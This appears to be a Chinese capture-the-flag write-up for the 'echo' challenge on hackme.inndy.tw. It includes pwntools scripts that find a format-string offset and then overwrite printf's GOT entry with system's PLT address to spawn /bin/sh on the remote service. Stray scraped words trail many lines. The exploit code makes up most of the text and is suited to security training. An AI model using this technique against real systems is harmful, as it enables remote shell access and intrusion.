题目名称就已是很明显的提示了!echo ~ 提示:格式化字符串html
从IDA中看main:便可看到printf(&s)!python
漏洞原理部分:函数
http://www.cnblogs.com/Ox9A82/p/5429099.html工具
漏洞刷题提高:post
https://www.anquanke.com/post/id/85785测试
https://www.anquanke.com/post/id/147666debug
回到这个题,仍是先checksec:code
结合须要从连接中获得的知识点,咱们开始泄露偏移:htm
输入了%p,输出的是0x100,便是fgets的256 = 0x100,利用工具能够直接获得,代码以下:blog
#!/usr/bin/env python # coding=utf-8 from pwn import * context.log_level = "debug" def exec_fmt(payload): io = process("./echo") io.sendline(payload) info = io.recv() io.close() return info autofmt = FmtStr(exec_fmt) print autofmt.offset
获得输出是7,测试一下:
而后,将printf的got表的地址覆盖成system的plt表的地址,而后输入"/bin/sh",即原来是利用printf函数输出该字符串,修改以后即执行system("/bin/sh")
#!/usr/bin/env python # coding=utf-8 from pwn import * #io = process("./echo") io = remote("hackme.inndy.tw", 7711) elf = ELF("./echo") system_plt = elf.plt["system"] printf_got = elf.got["printf"] payload = fmtstr_payload(7, {printf_got:system_plt}) io.sendline(payload) sleep(1) io.sendline("/bin/sh\x00") io.interactive()